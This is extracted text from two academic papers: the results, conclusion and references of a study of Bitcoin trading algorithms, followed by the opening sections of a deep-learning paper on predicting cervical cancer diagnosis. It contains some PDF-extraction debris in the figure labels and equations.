0.043 VLMA(10,30,0.02) – 0.471 0.137 0.758 0.572 0.063 0.042 FLMA(10,30,0.01) – – 0.499 0.486 0.329 0.053 0.043 FLMA(10,30,0.02) – – – 0.73 0.546 0.065 0.43 RP(30) – – – – 0.008 0 0 RP∗(30) – – – – – 0 0 KT(30) – – – – – – 0.616 are statistically significant than BH only (see Table 6), whereas RP∗ achieves statistically significant returns than RP, KT , and BH only. How the number of buy and sell signals vary for BTC? We record the number of buy and sell signals, as well as the number of completed transactions. A transaction is completed when for a buy signal the corresponding sell transaction occurs. Figure 1 summarizes the number of buy, sell and completed transactions. We observed that considering 15 days trading period for BTC, VLMA and FLMA based strategies resulted in 6% completed transactions. VLMA generates 2% more buy and sell signals than FLMA. This is logical as VLMA based strategies do not have any holding period and are free to generate a signal if the corresponding criterion is met. For reservation price algorithms, the number of completed transactions are in the range of 27−32%. Buy and hold has the highest number of completed transactions as it does not generate buy and sell signals based on some predefined criterion, but instead buys on the first trading day and sells on the last trading day irrespective of the offered exchange rate. For trading period of length 30 days, the same trend is observed for VLMA and FLMA based strategies. Our analysis of the data reveals that for VLMA on average 96% of the buy transactions remains open whereas the corresponding number for the sell signal is 94%. Likewise, the percentage of open buy and sell signals for FLMA are 22% and 19% only. For reservation price algorithms, the number of completed transactions are reduced to 14−20%. Ahmad et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.337 13/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.337 V L M A ( 5 , 1 5 , 0 . 0 1 ) V L M A ( 5 , 1 5 , 0 . 0 2 ) F L M A ( 5 , 1 5 , 0 . 0 1 ) F L M A ( 5 , 1 5 , 0 . 0 2 ) R P ( 1 5 ) R P * ( 1 5 ) K T ( 1 5 ) B H ( 1 5 ) V L M A ( 1 0 , 3 0 , 0 . 0 1 ) V L M A ( 1 0 , 3 0 , 0 . 0 2 ) F L M A ( 1 0 , 3 0 , 0 . 0 1 ) F L M A ( 1 0 , 3 0 , 0 . 0 2 ) R P ( 3 0 ) R P * ( 3 0 ) K T ( 3 0 ) B H ( 3 0 ) 0 2 0 0 4 0 0 6 0 0 8 0 0 1 0 0 0 1 2 0 0 1 4 0 0 1 6 0 0 No .o fS ign als /Tr an sa cti on A l g o r i t h m s B u y S i g n a l S e l l S i g n a l s C o m p l e t e d T x s Figure 1 Number of Buy and Sell Signals and Complete Transactions for BTC. Full-size DOI: 10.7717/peerjcs.337/fig-1 What are the number of positive and negative returned transactions for BTC? We investigate completed transactions from the perspective of positive vs negative returns for BTC. We define a transaction to yield positive returns if the sell price is higher than the buy price, i.e., rj >1 where rj represents the returns of the trading period j. For 15 days trading period, we observe that the VLMA and FLMA based strategies have higher percentage (> 50%) of negative returned transactions. For the reservation price policy, KT has more negative transactions (> 50%) whereas RP and RP∗ have higher positive transactions. RP has 66.8%, and RP∗ has 72 positive returned transactions. BH has 45% positive returned transactions. The worst rate of positive returned transaction is observed for KT (40%). For trading duration of 30 days, rather surprisingly, the percentage of positive returned transaction increased slightly for VLMA, FLMA and KT , whereas a reduction is observed for RP and RP∗. Figure 2 is a graphical summary of the positive and negative returned transaction for BTC. How the transaction fee effect the profitablity of algorithms? Transaction fee can be a vital factor in the profitability of any trading algorithm. We consider a transaction fee TF ={0%,2%,4%} and calculate GPR to find the effect on the profitability. Figure 3 is a graphical representation of the effect of transaction fee on GPR of algorithms for BTC. We observed an average reduction of 3.9% and 7.6% in the GPR of algorithms when transaction fee of 2% and 4% are levied. Introducing a transaction fee of 2% reduced the positive returned strategies from 11 to 5 only, which are further reduced to 2 (RP and RP∗) when the transaction fee is increased to 4%. For Euro, the profitability of algorithm is severely reduced from 16 to 0 strategies when the transaction fee of 4% is introduced. Rather interestingly, for Yen the introduction of transaction fee reduces Ahmad et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.337 14/19 https://peerj.com https://doi.org/10.7717/peerjcs.337/fig-1 http://dx.doi.org/10.7717/peerj-cs.337 V L M A ( 5 , 1 5 , 0 . 0 1 ) V L M A ( 5 , 1 5 , 0 . 0 2 ) F L M A ( 5 , 1 5 , 0 . 0 1 ) F L M A ( 5 , 1 5 , 0 . 0 2 ) R P ( 1 5 ) R P * ( 1 5 ) K T ( 1 5 ) B H ( 1 5 ) V L M A ( 1 0 , 3 0 , 0 . 0 1 ) V L M A ( 1 0 , 3 0 , 0 . 0 2 ) F L M A ( 1 0 , 3 0 , 0 . 0 1 ) F L M A ( 1 0 , 3 0 , 0 . 0 2 ) R P ( 3 0 ) R P * ( 3 0 ) K T ( 3 0 ) B H ( 3 0 ) 0 2 0 4 0 6 0 8 0 1 0 0 Pe rce nta ge A l g o r i t h m s N e g a t i v e T x P o s i t i v e T x Figure 2 Positive vs negative returned transactions. Full-size DOI: 10.7717/peerjcs.337/fig-2 V L M A ( 5 , 1 5 , 0 . 0 1 ) V L M A ( 5 , 1 5 , 0 . 0 2 ) F L M A ( 5 , 1 5 , 0 . 0 1 ) F L M A ( 5 , 1 5 , 0 . 0 2 ) R P ( 1 5 ) R P * ( 1 5 ) K T ( 1 5 ) B H ( 1 5 ) V L M A ( 1 0 , 3 0 , 0 . 0 1 ) V L M A ( 1 0 , 3 0 , 0 . 0 2 ) F L M A ( 1 0 , 3 0 , 0 . 0 1 ) F L M A ( 1 0 , 3 0 , 0 . 0 2 ) R P ( 3 0 ) R P * ( 3 0 ) K T ( 3 0 ) B H ( 3 0 ) 0 . 8 0 0 . 8 5 0 . 9 0 0 . 9 5 1 . 0 0 1 . 0 5 1 . 1 0 Av era ge P eri od R etu rn A l g o r i t h m s 0 % 2 % 4 % Figure 3 The effect of transaction fee on GPR of BTC. Full-size DOI: 10.7717/peerjcs.337/fig-3 the number of profitable strategies from 15 to 4 after introduction of 2% transaction fee. However, there is no change in the number of profitable strategies when the transaction fee is increased to 4%. For Yen, the four profitable strategies are VLMA (5,15,0.02), FLMA (5,15,0.02), VLMA (10,30,0.02), FLMA (10,30,0.02). This also reflects that for variable length moving average strategies to be profitable the band value is vital. For smaller band values, the strategies might not be profitable. CONCLUSION We evaluated the short term profitability of BTC over a set of reservation price and moving average based algorithms against the euro and the yen for a period of 8 years. Based on the Ahmad et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.337 15/19 https://peerj.com https://doi.org/10.7717/peerjcs.337/fig-2 https://doi.org/10.7717/peerjcs.337/fig-3 http://dx.doi.org/10.7717/peerj-cs.337 average GPR, BTC seems less profitable venture than the yen; however, a deeper analysis revealed that the answer the profitability is strategy dependent as well. RP∗ achieved an average GPR of 10% for a trading period of 30 days, which is the maximum return obtained by any trading algorithm among the three assets. This confirmed BTC as an attractive investment opportunity for a short term investment. Our analysis also revealed that RP and RP∗ are the best performing algorithms on BTC, whereas moving average based algorithms return higher profits for the euro and the yen. It is also shown that the selected set of algorithms beat the buy and hold approach except on the yen where the returns of KT are less than that of buy and hold. Further, we highlighted that the returns of all the selected algorithms became negative except for RP and RP∗ when a transaction fee of 2% was introduced. Increasing the transaction fee to 4% resulted in positive returns for RP and RP∗ on 30 days investment horizon. For all other algorithms and their variants the returns were negative for a transaction fee of 4%. To the best of our knowledge, this study is the first of its kind to evaluate the profitability of BTC using a set of trading algorithms and against fiat currencies. Future work can include finding an optimized portfolio of fiat and crypto-currencies for short and long term investment. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare there are no competing interests. Author Contributions • Iftikhar Ahmad conceived and designed the experiments, performed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. • Muhammad Ovais Ahmad conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. • Mohammed A. Alqarni conceived and designed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Abdulwahab Ali Almazroi performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Muhammad Imran Khan Khalil performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Data and code can found in the Supplementary Files. Ahmad et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.337 16/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.337#supplemental-information http://dx.doi.org/10.7717/peerj-cs.337 Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.337#supplemental-information. REFERENCES Abbey BS, Doukas JA. 2012. Is technical analysis profitable forindividual currency traders? The Journal of Portfolio Management 39(1):142–150. Ahmad I, Schmidt G. 2012. An experimental analysis of online unidirectional conver- sion problem. In: Huemer C, Lops P, eds. E-commerce and web technologies. Berlin: Springer Berlin Heidelberg, 176–187. Alessandretti L, ElBahrawy A, Aiello LM, Baronchelli A. 2018. Anticipating cryptocurrency prices using machine learning. Complexity 2018:8983590 DOI 10.1155/2018/8983590. Baur DG, Dichtl H, Drobetz W, Wendt V-S. 2018. Investing in gold Market tim- ing or buy-and-hold? International Review of Financial Analysis 71:101281 DOI 10.1016/j.irfa.2018.11.008. Brière M, Oosterlinck K, Szafarz A. 2015. Virtual currency, tangible return: Port- folio diversification with bitcoin. Journal of Asset Management 16(6):365–373 DOI 10.1057/jam.2015.5. Brock W, Lakonishok J, LeBaron B. 1992. Simple Technical Trading Rules and the Stochastic Properties of Stock Returns. The Journal of Finance 47(5):1731–1764. Chang Y-H, Jong C-C, Wang S-C. 2017. Size, trading volume, and the profitability of technical trading. International Journal of Managerial Finance 13(4):475–494. Coakley J, Marzano M, Nankervis J. 2016. How profitable are FX technical trading rules? International Review of Financial Analysis 45:273 –282 DOI 10.1016/j.irfa.2016.03.010. El-Yaniv R, Fiat A, Karp RM, Turpin G. 2001. Optimal Search and One-Way Trading Online Algorithms. Algorithmica 30:101–139. Fang J, Jacobsen B, Qin Y. 2014. Predictability of the simple technical trading rules: an out-of-sample test. Review of Financial Economics 23(1):30 –45 DOI 10.1016/j.rfe.2013.05.004. Gunasekarage A, Power DM. 2001. The profitability of moving average trading rules in South Asian stock markets. Emerging Markets Review 2(1):17 –33 DOI 10.1016/S1566-0141(00)00017-0. Hsu P-H, Hsu Y-C, Kuan C-M. 2010. Testing the predictive ability of technical analysis using a new stepwise test without data snooping bias. Journal of Empirical Finance 17(3):471 –484 DOI 10.1016/j.jempfin.2010.01.001. Hsu P-H, Taylor MP, Wang Z. 2016. Technical trading: Is it still beating the foreign ex- change market? Journal of International Economics 102:188 –208 DOI 10.1016/j.jinteco.2016.03.012. Iqbal J, Ahmad I. 2015. Optimal online k-min search. EURO Journal on Computational Optimization 3(2):147–160. Ahmad et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.337 17/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.337#supplemental-information http://dx.doi.org/10.7717/peerj-cs.337#supplemental-information http://dx.doi.org/10.1155/2018/8983590 http://dx.doi.org/10.1016/j.irfa.2018.11.008 http://dx.doi.org/10.1057/jam.2015.5 http://dx.doi.org/10.1016/j.irfa.2016.03.010 http://dx.doi.org/10.1016/j.rfe.2013.05.004 http://dx.doi.org/10.1016/S1566-0141(00)00017-0 http://dx.doi.org/10.1016/j.jempfin.2010.01.001 http://dx.doi.org/10.1016/j.jinteco.2016.03.012 http://dx.doi.org/10.7717/peerj-cs.337 Iqbal J, Ahmad I, Schmidt G. 2012. Can online trading algorithms beat the market? An experimental evaluation. In: 3rd student conference on operational research. Wadern: Schloss Dagstuhl- Leibniz-Zentrum fuer Informatik. Iqbal J, Ahmad I, Shah A. 2019. Competitive algorithms for online conversion problem with interrelated prices. International Journal of Advanced Computer Science and Applications 10(6):582–589 DOI 10.14569/IJACSA.2019.0100675. Jiang F, Tong G, Song G. 2019. Technical Analysis Profitability Without Data Snoop- ing Bias: Evidence from Chinese Stock Market. International Review of Finance 19(1):191–206 DOI 10.1111/irfi.12161. Kao M-Y, Tate SR. 1999. On-line difference maximization. SIAM Journal on Discrete Mathematics 12(1):78–90. Menkhoff L, Taylor MP. 2007. The obstinate passion of foreign exchange professionals: technical analysis. Journal of Economic Literature 45(4):936–972. Mohr E, Ahmad I, Schmidt G. 2014. Online algorithms for conversion problems: a survey. Surveys in Operations Research and Management Science 19(2):87–104. Moore T. 2013. The promise and perils of digital currencies. International Journal of Critical Infrastructure Protection 3(6):147–149. Nakamoto S. 2008. Bitcoin: a peer-to-peer electronic cash system. Available at https: //bitcoin.org/bitcoin.pdf . Narayanan A, Bonneau J, Felten E, Miller A, Goldfeder S. 2016. Bitcoin and cryptocur- rency technologies: a comprehensive introduction. Princeton: Princeton University Press. Nguyen T, De Bodisco C, Thaver R. 2018. Factors affecting Bitcoin price in the cryp- tocurrency market: an empirical study. International Journal of Business & Economics Perspectives 13(1)106–125. Schmidt G, Mohr E, Kersch M. 2010. Experimental analysis of an online trading algorithm. Electronic Notes in Discrete Mathematics 36:519–526. Schroeder P, Dochow R, Schmidt G. 2018. Optimal solutions for the online time series search and one-way trading problem with interrelated prices and a profit function. Computers & Industrial Engineering 119:465 –471 DOI 10.1016/j.cie.2018.03.034. Strobel M, Auer BR. 2018. Does the predictive power of variable moving average rules vanish over time and can we explain such tendencies? International Review of Economics & Finance 53:168 –184 DOI 10.1016/j.iref.2017.10.012. Uras N, Marchesi L, Marchesi M, Tonelli R. 2020. Forecasting Bitcoin closing price series using linear regression and neural networks models. PeerJ Computer Science 6:e279 DOI 10.7717/peerj-cs.279. Wang S, Vergne J-P. 2017. Buzz factor or innovation potential: What explains cryptocur- rencies returns? PLOS ONE 12(1):e0169556 DOI 10.1371/journal.pone.0177659. Żbikowski K. 2016. Application of Machine Learning Algorithms for Bitcoin Automated Trading. In: Ryzko D, Gawrysiak P, Kryszkiewicz M, Rybiński H, eds. Machine intelligence and big data in industry. Cham: Springer International Publishing 161–168 DOI 10.1007/978-3-319-30315-4_14. Ahmad et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.337 18/19 https://peerj.com http://dx.doi.org/10.14569/IJACSA.2019.0100675 http://dx.doi.org/10.1111/irfi.12161 https://bitcoin.org/bitcoin.pdf https://bitcoin.org/bitcoin.pdf http://dx.doi.org/10.1016/j.cie.2018.03.034 http://dx.doi.org/10.1016/j.iref.2017.10.012 http://dx.doi.org/10.7717/peerj-cs.279 http://dx.doi.org/10.1371/journal.pone.0177659 http://dx.doi.org/10.1007/978-3-319-30315-4_14 http://dx.doi.org/10.7717/peerj-cs.337 Zhu H, Jiang Z-Q, Li S-P, Zhou W-X. 2015. Profitability of simple technical trading rules of Chinese stock exchange indexes. Physica A: Statistical Mechanics and its Applications 439:75 –84 DOI 10.1016/j.physa.2015.07.032. Ahmad et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.337 19/19 https://peerj.com http://dx.doi.org/10.1016/j.physa.2015.07.032 http://dx.doi.org/10.7717/peerj-cs.337 work_d6kjnyqzwjcgzjuphidi4rvpvu ---- Supervised deep learning embeddings for the prediction of cervical cancer diagnosis Supervised deep learning embeddings for the prediction of cervical cancer diagnosis Kelwin Fernandes1,2, Davide Chicco3, Jaime S. Cardoso1,2 and Jessica Fernandes4 1 Instituto de Engenharia de Sistemas e Computadores Tecnologia e Ciencia (INESC TEC), Porto, Portugal 2 Universidade do Porto, Porto, Portugal 3 Princess Margaret Cancer Centre, Toronto, ON, Canada 4 Universidad Central de Venezuela, Caracas, Venezuela ABSTRACT Cervical cancer remains a significant cause of mortality all around the world, even if it can be prevented and cured by removing affected tissues in early stages. Providing universal and efficient access to cervical screening programs is a challenge that requires identifying vulnerable individuals in the population, among other steps. In this work, we present a computationally automated strategy for predicting the outcome of the patient biopsy, given risk patterns from individual medical records. We propose a machine learning technique that allows a joint and fully supervised optimization of dimensionality reduction and classification models. We also build a model able to highlight relevant properties in the low dimensional space, to ease the classification of patients. We instantiated the proposed approach with deep learning architectures, and achieved accurate prediction results (top area under the curve AUC = 0.6875) which outperform previously developed methods, such as denoising autoencoders. Additionally, we explored some clinical findings from the embedding spaces, and we validated them through the medical literature, making them reliable for physicians and biomedical researchers. Subjects Bioinformatics, Computational Biology, Artificial Intelligence, Data Mining and Machine Learning Keywords Dimensionality reduction, Health-care informatics, Denoising autoencoder, Autoencoder, Biomedical informatics, Binary classification, Deep learning, Cervical cancer, Artificial neural networks, Health informatics INTRODUCTION Despite the possibility of prevention with regular cytological screening, cervical cancer remains a significant cause of mortality in low-income countries (Kauffman et al., 2013). The cervical tumor is the cause of more than 500,000 cases per year, and kills more than 250,000 patients in the same period, worldwide (Fernandes, Cardoso & Fernandes, 2015). However, cervical cancer can be prevented by means of the human papillomavirus infection (HPV) vaccine, and regular low-cost screening programs (Centers for Disease Control and Prevention (CDC), 2013). The two most widespread techniques in screening programs are conventional or liquid cytology and colposcopy (Fernandes, Cardoso & Fernandes, 2015; Plissiti & Nikou, 2013; Fernandes, Cardoso & Fernandes, 2017b; Xu et al., 2016). Furthermore, this cancer can be cured by removing the affected tissues when How to cite this article Fernandes et al. (2018), Supervised deep learning embeddings for the prediction of cervical cancer diagnosis. PeerJ Comput. Sci. 4:e154; DOI 10.7717/peerj-cs.154 Submitted 17 February 2018 Accepted 26 April 2018 Published 14 May 2018 Corresponding author Kelwin Fernandes, kafc@inesctec.pt Academic editor Sebastian Ventura Additional Information and Declarations can be found on page 16 DOI 10.7717/peerj-cs.154 Copyright 2018 Fernandes et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.154 mailto:kafc@�inesctec.�pt https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.154 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ identified in early stages (Fernandes, Cardoso & Fernandes, 2015; Centers for Disease Control and Prevention (CDC), 2013), in most cases. The development of cervical cancer is usually slow and preceded by abnormalities in the cervix (dysplasia). However, the absence of early stage symptoms might cause carelessness in prevention. Additionally, in developing countries, there is a lack of resources, and patients usually have poor adherence to routine screening due to low problem awareness. While improving the resection of lesions in the first visits has a direct impact on patients that attend screening programs, the most vulnerable populations have poor or even non-existent adherence to treatment programs. Scarce awareness of the problem and patients’ discomfort with the medical procedure might be the main causes of this problem. Furthermore, in low-income countries, this issue can be due to lack of access to vulnerable populations with low access to information and medical centers. Consequently, the computational prediction of individual patient risk has a key role in this context. Identifying patients with the highest risk of developing cervical cancer can improve the targeting efficacy of cervical cancer screening programs: our software performs this operation computationally in a few minutes by producing accurate prediction scores. Fernandes, Cardoso & Fernandes (2017b) performed a preliminary attempt to tackle the problem of predicting the patient’s risk to develop cervical cancer through machine learning software. In that project, the authors employed transfer learning strategies for the prediction of the individual patient risk on a dataset of cervical patient medical tests. They focused on transferring knowledge between linear classifiers on similar tasks, to predict the patient’s risk (Fernandes, Cardoso & Fernandes, 2017b). Given the high sparsity of the associated risk factors in the population, dimensionality reduction techniques can improve the robustness of the machine learning predictive models. However, many projects that take advantage of dimensionality reduction and classification use suboptimal approaches, where each component is learned separately (Li et al., 2012; Bessa et al., 2014; Lacoste-Julien, Sha & Jordan, 2009). In this work, we propose a joint strategy to learn the low-dimensional space and the classifier itself in a fully supervised way. Our strategy is able to reduce class overlap by concentrating observations from the healthy patients class into a single point of the space, while retaining as much information as possible from the patients with high risk of developing cervical cancer. We based our prediction algorithm on artificial neural networks (ANNs), which are machine learning methods able to discover non-linear patterns by means of aggregation of functions with non-linear activations. A recent trend in this field is deep learning (LeCun, Bengio & Hinton, 2015), which involves large neural network architectures with successive applications of such functions. Deep learning, in fact, has been able to provide accurate predictions of patient diagnosis in multiple medical domains (Xu et al., 2016; Chicco, Sadowski & Baldi, 2014; Fernandes, Cardoso & Astrup, 2017a; Cangelosi et al., 2016; Alipanahi et al., 2015). We applied our learning scheme to deep variational autoencoders and feed-forward neural networks. Finally, we explored Fernandes et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.154 2/20 http://dx.doi.org/10.7717/peerj-cs.154 https://peerj.com/computer-science/ visualization techniques to understand and validate the medical concepts captured by the embeddings. We organize the rest of the paper as follows. After this Introduction, we describe the proposed method and the dataset analyzed in the Methods and Dataset sections. Afterwards, we describe the computational prediction results in the Results section, the model outcome interpretation in the Discussion section, and we conclude the manuscript outlining some conclusion and future development. METHODS High dimensional data can lead to several problems: in addition to high computational costs (in memory and time), it often leads to overfitting (Van Der Maaten, Postma & Van den Herik, 2009; Chicco, 2017; Moore, 2004). Dimensionality reduction can limit these problems and, additionally, can improve the visualization and interpretation of the dataset, because it allows researchers to focus on a reduced number of features. For these reasons, we decided to map the original dataset features into a reduced dimensionality before performing the classification task. Generally, to tackle high-dimensional classification problems, machine learning traditional approaches attempt to reduce the high-dimensional feature space to a low-dimensional one, to facilitate the posterior fitting of a predictive model. In many cases, researchers perform these two steps separately, deriving suboptimal combined models (Li et al., 2012; Bessa et al., 2014; Lacoste-Julien, Sha & Jordan, 2009). Moreover, since dimensionality reduction techniques are often learned in an unsupervised fashion, they are unable to preserve and exploit the separability between observations from different classes. In dimensionality reduction, researchers use two categories of objective functions: one for maximizing the model capability of recovering the original feature space from the compressed low dimensional one, and another one for maximizing the consistency of pairwise similarities in both high and low dimensional spaces. Since defining a similarity metric in a high-dimensional space might be difficult, we limit the scope of this work to minimizing the reconstruction loss. In this sense, given a set of labeled input vectors X = {x1, x2, : : : , xn}, where xi ∈ R d , ∀i ∈ 1, : : : ,n and Y is a vector with the labels associated to each observation, we want to obtain two functions C: R d / Rm and D: Rm / Rd such that m < d and that minimizes the following loss: LrðC; D; XÞ ¼ 1 jXj X x2X ðD � CÞðxÞ � xð Þ2 (1) Namely, the composition (○) of the compressing (C), and decompressing (D) functions approximate the identity function. In the following sections, we describe the proposed dimensionality reduction technique and its instantiation to deep learning architectures. Fernandes et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.154 3/20 http://dx.doi.org/10.7717/peerj-cs.154 https://peerj.com/computer-science/ Joint dimensionality reduction and classification Since our final goal is to classify the data instances (observations), we need to achieve a good low-dimensional mapping and build the classifier independently. Thereby, we propose a joint loss function that minimizes the trade-off between data reconstruction and classification performance: LðM; C; D; X; YÞ ¼ LcððM � CÞðXÞ; YÞ þ �LrðC; D; XÞ (2) where M is a classifier that receives as input the vectors in the low dimensional space (C(X)), Lc is a classification loss function such as categorical cross-entropy, and � � 0. In this case, we focus on the classification performance using Eq. (1) as a regularization factor of the models of interest. Hereafter, we will denote this method as semi-supervised dimensionality reduction. Fully supervised embeddings The previously proposed loss function consists of two components: a supervised component given by the classification task, and an unsupervised component given by the low-dimensional mapping. However, the scientific community aims at understanding the properties captured in the embeddings, especially on visual and text embeddings (Kiros, Salakhutdinov & Zemel, 2014; Levy, Goldberg & Ramat-Gan, 2014). Moreover, inducing properties in the low-dimensional space can improve the class separability. To apply this enhancement, we introduce partial supervision in the Lr loss. We can explore these properties by learning the dimensionality reduction process in a supervised way. Namely, learning a bottleneck supervised mapping function ((D ○ C)(x) ≈ M(x, y)) instead of the traditional identity function ((D ○ C)(x) ≈ x) used in reconstruction-based dimensionality reduction techniques. The reconstruction loss Lr(C, D, X) becomes: LMðC; D; X; YÞ ¼ 1 jXj X hx;yi2X;Y ðD � CÞðxÞ � Mðx; yÞð Þ2 (3) where M(x) is the desired supervised mapping. To facilitate the classification task, removing the overlap between both classes should be captured in low-dimensional spaces. Without loss of generality, we assume that the feature space is non-negative. Thereby we favor models with high linear separability between observations by using the mapping function Eq. (4) in Eq. (3). Symðx; yÞ ¼ x; if y�x; if:y � (4) In our application, if all the features are non-negative, the optimal patient’s behavior associates to the zero vector with total lack of risk patterns. On the other hand, a patient with high feature values is prone to have cancer. Within the context of cervical cancer screening, we propose the mapping given by Eq. (5), where the decoded version of the healthy patients is the zero vector. This idea resembles the fact that their risk conduct Fernandes et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.154 4/20 http://dx.doi.org/10.7717/peerj-cs.154 https://peerj.com/computer-science/ has not contributed to the disease occurrence. On the other hand, we mapped ill patients to their original feature space, for promoting the low-dimensional vectors to explain the original risk patterns that originated the disease. Zeroðx; yÞ ¼ 1 ðyÞ � x (5) While the definition of the properties of interest to be captured by the low-dimensional space is application-dependent, the strategy to promote such behavior can be adapted to other contexts. Deep supervised autoencoders Autoencoders are special cases of deep neural networks for dimensionality reduction (Chicco, Sadowski & Baldi, 2014; Vincent et al., 2008). They can be seen as general feed- forward neural networks with two main sub-components: the first part of the neural network is known as the encoder, and its main purpose is to compress the feature space. The neural network achieves this step by using hidden layers with fewer units than the input features, or by enforcing sparsity in the hidden representation. The second part of the neural network, also known as the decoder, behaves in the opposite way, and tries to approximate the inverse encoding function. While these two components correspond to the C and D functions in Eq. (1), respectively, they can be broadly seen as a single ANN that learns the identity function through a bottleneck, a low number of units, or through sparse activations. Autoencoders are usually learned in an unsupervised fashion by minimizing the quadratic error Eq. (1). Denoising autoencoders (DA) represent a special case of deep autoencoders that attempt to reconstruct the input vector when given a corrupted version (Vincent et al., 2008). DA can learn valuable representations even in the presence of noise. Scientists can experiment this task by adding an artificial source of noise in the input vectors. In the neural network architecture (Fig. 1), we also included a dropout layer after the input layer that randomly turns off at maximum one feature per patient (Srivastava et al., 2014). Thereby, we aim to build stable classifiers that produce similar outcomes for patients with small differences in their historical records. Furthermore, we aim at producing stable decisions when patients lie on a subset of the answers to the doctors’ questions during the medical visit, by indicating absence of a given risk behavior (for example, high number of sexual partners, drug consumption, and others). We use a Parametric Rectifier Linear Unit (PReLU) (He et al., 2015) as activation function in the hidden layers of our architectures (Fig. 1). PReLU is a generalization of standard rectifier activation units, which can improve model fitting with low additional computational cost (He et al., 2015). The loss functions (Eqs. 2 and 3) can learn a joint classification and encoding–decoding network in a multitask fashion (Fig. 2). Additionally, to allow the neural network to use either the learned or the original representation, we include a bypass layer that concatenates the hidden representation with the corrupted input. In the past, researchers have used this technique in biomedical image segmentation with U-net architectures (Ronneberger, Fischer & Brox, 2015) to recover possible losses in the compression process, Fernandes et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.154 5/20 http://dx.doi.org/10.7717/peerj-cs.154 https://peerj.com/computer-science/ and to reduce the problem of vanishing gradients. We use this bypass layer with cross-validation. In a nutshell, our contribution can be summarized as follows: (i) we formalized a loss function to handle dimensionality reduction and classification in a joint fashion, leading to a global optimal pipeline; (ii) in order to induce desired properties on the compressed space, we proposed a loss that measures the model’s capability to recreate a mapping with the desired property instead of the identity function usually applied in dimensionality reduction; (iii) we showed that multitask autoencoders based on neural networks can be used as a specific instance to solve this problem, and we instantiated this idea to model an individual patient’s risk of having cervical cancer. DATASET The dataset we analyze contains medical records of 858 patients, and covers a random sampling of patients between 2012 and 2013 who attended the gynecology service at Figure 1 Deep denoising autoencoder. The blocks in blue and red represent the encoding (C) and decoding (D) components of the network, respectively. Full-size DOI: 10.7717/peerj-cs.154/fig-1 Fernandes et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.154 6/20 http://dx.doi.org/10.7717/peerj-cs.154/fig-1 http://dx.doi.org/10.7717/peerj-cs.154 https://peerj.com/computer-science/ Hospital Universitario de Caracas in Caracas, Venezuela. Most of the patients belong to the lowest socioeconomic status (Graffar classification: IV–V (Graffar, 1956)) with low income and educational level, being the population with the highest risk. The age of the patients spans between 13 and 84 years old (27 years old on average). All patients are sexually active and most of them (98%) have been pregnant at least once. The screening process covers traditional cytology, the colposcopic assessment with acetic acid and the Schiller test (Lugol’s iodine solution) (Fernandes, Cardoso & Fernandes, 2017b). The medical records include the age of the patient, sexual activity (number of sexual partners and age of first sexual intercourse), number of pregnancies, smoking behavior, use of contraceptives (hormonal and intrauterine devices), and historical records of sexually transmitted diseases (STDs) (Table 1). Hence, we encoded the features denoted by bool � T, T ∈ {bool, int} as two independent values: whether or not the patient answered the question and, if she did, the answered value. In some cases, the patients decided not to answer some questions for privacy concerns. This behavior is often associated with risk behaviors being a relevant feature to explore when modeling risk patterns. Therefore, we added a flag feature that allows the model to identify if the question was answered or not after missing value imputation. We encoded the categorical features using the one-of-K scheme. The hospital anonymized all the records before releasing the dataset. The dataset is now publically available on the Machine Learning Repository website of the University of California Irvine (UCI ML) (University of California Irvine, 1987), Figure 2 Supervised deep embedding architecture. The blocks in blue, red, and green represent the encoding (C), decoding (D), and classification (M) components of the network, respectively. Full-size DOI: 10.7717/peerj-cs.154/fig-2 Fernandes et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.154 7/20 http://dx.doi.org/10.7717/peerj-cs.154/fig-2 http://dx.doi.org/10.7717/peerj-cs.154 https://peerj.com/computer-science/ which also contains a description of the features (University of California Irvine Machine Learning Repository, 2017). To avoid problems of the algorithm behavior related to different value ranges of each feature, we scaled all the features in our experiments using [0,1] normalization, and we input missing data using the average value (Chicco, 2017). While more complex pre-processing schemes could be introduced, such as inferring the missing value with a k-nearest neighbor model (Santos et al., 2015), we decided to use this methodology to avoid additional complexity that would make it difficult to fairly compare the explored techniques. In most cases, the features positively correlate to the cancer variable, with 0 representing the lack of that risk pattern and 1 representing the maximum risk. RESULTS We measured the performance of the proposed methods with the area under the Precision–Recall (PR) curves (Davis & Goadrich, 2006; Chicco, 2017) and the logistic loss (also known as cross-entropy loss) function. As baseline, we use a deep feed-forward neural network with a softmax activation in the output layer. The remaining parameters (such as the initial dropout layer, depth and optimization algorithm) conform to the ones used in the proposed methodologies (Table 2). The main hyper-parameters related to the network topology are the depth and width, which define the number of layers in the architecture and the size of the low-dimensional representation. Table 1 Feature names and data type acquired in the risk factors dataset (Fernandes, Cardoso & Fernandes, 2017b). Feature Type Feature 